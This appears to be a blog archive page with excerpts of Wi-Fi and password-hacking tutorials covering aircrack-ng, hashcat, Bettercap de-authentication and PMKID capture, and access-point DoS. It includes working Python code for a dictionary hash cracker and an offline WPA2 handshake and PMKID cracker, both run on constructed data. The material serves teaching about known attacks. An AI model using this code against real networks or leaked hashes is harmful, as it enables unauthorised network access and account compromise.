Posts

Showing posts from January, 2022

Wireless Hacking: Cracking the WPA2-PSK with aircrack-ng

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy (WEP) was created to give wireless communications confidentiality. WEP proved terribly flawed and easily cracked. As a replacement, most wireless access points now use Wi-Fi Protected Access 2 with a pre-shared key, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that is very difficult to crack, but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this. The weakness in the WPA2-PSK system is the 4-way handshake: when a client authenticates to the access point (AP), the client and the AP exchange four messages in which each side proves it holds the key derived from the pre-shared key. The password itself never crosses the air, but the handshake carries a message integrity code (MIC) computed from it, so if we capture the handshake we can test candidate passwords offline against that MIC until one matches. In this tutorial from our Wireless Hacking series, we'll look at using aircrack-ng and a dictionary attack on the encrypted passwor...

Cracking Passwords with hashcat

Continuing with my series on how to crack passwords, I now want to introduce you to one of the newest and best designed password crackers out there: hashcat. The beauty of hashcat is in its design, which focuses on speed and versatility. It enables us to crack multiple types of hashes, in multiple ways, very fast. As mentioned in the first part of this series, passwords are not stored as reversible encryption but as the output of one-way hash functions. There are multiple ways of obtaining these hashes, such as DLL injection on Windows systems or capturing the hash in transit, as in WPA2 wireless cracking. Once we can grab the hash, the next step becomes one of finding an effective and efficient way of cracking it. There are numerous tools, some of which I have highlighted in other articles here, but hashcat is unique in its design and versatility, so let's take a look at how it works.

Step 1: Fire Up Kali & Open Hashcat
Let's start by firing up Kali and opening hashcat. Go to Applications -> Kali L...
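To make the "speed and versatility" point concrete, here is a miniature of what a cracker like hashcat does on an unsalted hash: pick a hash mode, run every wordlist entry through a set of mangling rules, hash each candidate once, and compare it against every target hash of that mode in a single pass. This is example code added for this page, not hashcat's own code; the mode numbers are hashcat's (-m 0 MD5, -m 100 SHA1, -m 1400 SHA-256), while the rule set, the wordlist and the target hashes are constructed here for the demonstration.

```python
"""Mini dictionary-plus-rules cracker for unsalted hashes (example added for this
page; not hashcat's code). Targets and wordlist below are constructed."""
import hashlib

# hashcat mode numbers for three unsalted modes: -m 0 MD5, -m 100 SHA1, -m 1400 SHA-256
MODES = {0: "md5", 100: "sha1", 1400: "sha256"}


def guess_mode(hexdigest):
    """Guess a mode from digest length. hashcat makes you state the mode explicitly,
    because many algorithms share a length (MD5 and NTLM are both 32 hex chars)."""
    return {32: 0, 40: 100, 64: 1400}.get(len(hexdigest))


def rules(word):
    """Cheap stand-ins for hashcat rule functions: pass-through, capitalize, uppercase,
    reverse, append a common suffix, and a leet substitution (constructed rule set)."""
    yield word
    yield word.capitalize()
    yield word.upper()
    yield word[::-1]
    for suffix in ("1", "123", "!", "2022"):
        yield word + suffix
        yield word.capitalize() + suffix
    yield word.translate(str.maketrans("aeios", "43105"))


def crack(targets, wordlist, mode):
    """Crack many hashes of one mode at once: hash each candidate a single time and
    look it up in the set of wanted digests. Returns {digest: plaintext} for hits."""
    algo = MODES[mode]
    wanted = {t.lower() for t in targets}
    found = {}
    for word in wordlist:
        for cand in rules(word):
            digest = hashlib.new(algo, cand.encode()).hexdigest()
            if digest in wanted and digest not in found:
                found[digest] = cand
                if len(found) == len(wanted):
                    return found  # everything cracked, stop early
    return found


def h(mode, text):
    """Helper used only to construct the sample targets below."""
    return hashlib.new(MODES[mode], text.encode()).hexdigest()


# Constructed targets standing in for hashes pulled from a leaked database dump.
TARGETS_MD5 = [h(0, "Password1"), h(0, "dr4g0n"), h(0, "not-in-any-wordlist")]
WORDLIST = ["password", "dragon", "monkey", "letmein"]  # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    mode = guess_mode(TARGETS_MD5[0])
    for digest, plain in crack(TARGETS_MD5, WORDLIST, mode).items():
        print(f"{digest}:{plain}")
```

Two of the three targets fall to rules applied to "password" and "dragon"; the third is never produced by the wordlist and rules, which is the usual outcome of a dictionary attack against a genuinely random password. The same structure is what makes a fast unsalted hash such an easy target and a slow, salted one (bcrypt, or the 4096-round PBKDF2 behind WPA2) so much more expensive per candidate.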

Wi-Fi Hacking with Bettercap

Many of you are familiar with Bettercap as an excellent MiTM attack framework, but it can also be used to attack Wi-Fi APs. In this tutorial, we will use this versatile tool to find Wi-Fi APs, de-authenticate their clients, and capture crackable hashes with the PMKID attack. (The PMKID is sent by the AP in the first message of the handshake, so unlike a full 4-way handshake capture it does not strictly depend on a client being connected.)

Step 1: Install Bettercap
There are a number of ways of installing Bettercap, but probably the easiest is to install it from the Kali repository:
sudo apt install bettercap
Alternatively, you can install the dependencies and then do a gem install:
sudo gem install bettercap
Note that the gem is the legacy Ruby 1.x version of Bettercap; the current 2.x releases are written in Go, and the apt package tracks those.

Step 2: Check your Wi-Fi Adapter
Next, we need to check our Wi-Fi adapter. If you are using a VM such as VirtualBox or VMware Workstation, you will likely need an external USB Wi-Fi adapter (I'm using the Alfa card. It's simple, inexpensive and, most importantly, it works!). Use the ifconfig command in Linux to find the name of your adapter:
sudo ifconfig
Note that my adapter is named wlan0. Yours ...
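Both the aircrack-ng post above (cracking the 4-way handshake) and this one (cracking the PMKID) rest on the same offline computation, so here it is once, in working form: derive the PMK from each candidate passphrase with PBKDF2, then check it against either the handshake MIC or the PMKID. This is example code added for this page, not aircrack-ng's or bettercap's own; the SSID, MAC addresses, nonces, wordlist and the EAPOL message 2 frame are constructed here in place of a sniffed capture, and only the key derivation, MIC and PMKID formulas come from the standard.

```python
"""Offline WPA2-PSK cracking reduced to its core (example added for this page;
not aircrack-ng or bettercap code). The "capture" below is constructed."""
import hashlib
import hmac

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This is the expensive step and the reason WPA2 dictionary attacks are slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """First 16 bytes of the PTK (the KCK) via the 802.11 PRF-384. The PTK binds
    the PMK to both MACs and both nonces, which is why a handshake capture needs them."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3)  # 3 x 20 bytes covers the 48-byte CCMP PTK
    )
    return ptk[:16]


def eapol_mic(kck, eapol_frame) -> bytes:
    """WPA2/CCMP Key MIC: HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk, ap_mac, sta_mac) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC). No nonces, no client traffic."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_msg2(snonce, mic=bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 using the standard field layout (constructed for the demo)."""
    body = (
        b"\x02"          # descriptor type: RSN
        + b"\x01\x0a"    # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit set
        + b"\x00\x10"    # key length
        + bytes(8)       # replay counter
        + snonce         # key nonce (32 bytes)
        + bytes(16)      # key IV
        + bytes(8)       # key RSC
        + bytes(8)       # key ID
        + mic            # key MIC (16 bytes, lands at MIC_OFFSET)
        + b"\x00\x00"    # key data length
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type Key


def make_capture(passphrase):
    """Construct what a sniffer would hand us: SSID, MACs, nonces, message 2 with a valid MIC, and a PMKID."""
    ssid, ap_mac, sta_mac = "constructed-net", bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
    msg2 = build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))
    return {"ssid": ssid, "ap": ap_mac, "sta": sta_mac, "anonce": anonce, "snonce": snonce,
            "msg2": msg2, "pmkid": pmkid(pmk, ap_mac, sta_mac)}


def crack_handshake(cap, wordlist):
    """Dictionary attack on the 4-way handshake: recompute the message 2 MIC per candidate."""
    target = cap["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, cap["ssid"])
        kck = kck_from_pmk(pmk, cap["ap"], cap["sta"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(kck, cap["msg2"]), target):
            return word
    return None


def crack_pmkid(cap, wordlist):
    """Same attack against the PMKID: one PBKDF2 plus one HMAC per candidate, no nonces needed."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, cap["ssid"])
        if hmac.compare_digest(pmkid(pmk, cap["ap"], cap["sta"]), cap["pmkid"]):
            return word
    return None


WORDLIST = ["password", "letmein1", "Summer2022!", "correct horse"]  # constructed stand-in for a wordlist

if __name__ == "__main__":
    cap = make_capture("Summer2022!")
    print("handshake:", crack_handshake(cap, WORDLIST))
    print("pmkid:", crack_pmkid(cap, WORDLIST))
```

Two practical points fall out of the code. The PMK depends on the SSID as a salt, so rainbow tables only work per network name, and every candidate costs 4096 HMAC-SHA1 rounds, which is why real cracking moves to hashcat on a GPU. And the PMKID check needs neither nonces nor a client-side frame, which is why the PMKID attack can be run against an AP with no one connected, whereas the handshake path needs a client that you can catch associating, or de-authenticate so that it associates again.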

Continuous DoSing a Wireless AP

In previous tutorials for my Wi-Fi Hacking series, I have shown you how to crack WEP and WPA2 passwords, break a WPS PIN, and create Evil Twin and Rogue access points. In this continuation of the series, let's look at a slightly different approach to attacking wireless. (If you are new to hacking Wi-Fi, make sure you check out the getting started guide before attempting any of the tasks mentioned above.)

Our Cyber War Scenario
Your side, the good guys, of course, are about to launch an attack against the bad guys. Your mission is to knock out all of the wireless communication from their field command and control center so that your army can attack without any notifications being sent via Wi-Fi. Of course, in this scenario, we are only knocking out Wi-Fi communication. The bad guys could certainly still communicate by cellular phone, by wired communication, by satellite, etc., but those are the tasks of your compatriots. Your single task is to knock out their Wi-Fi communication ind...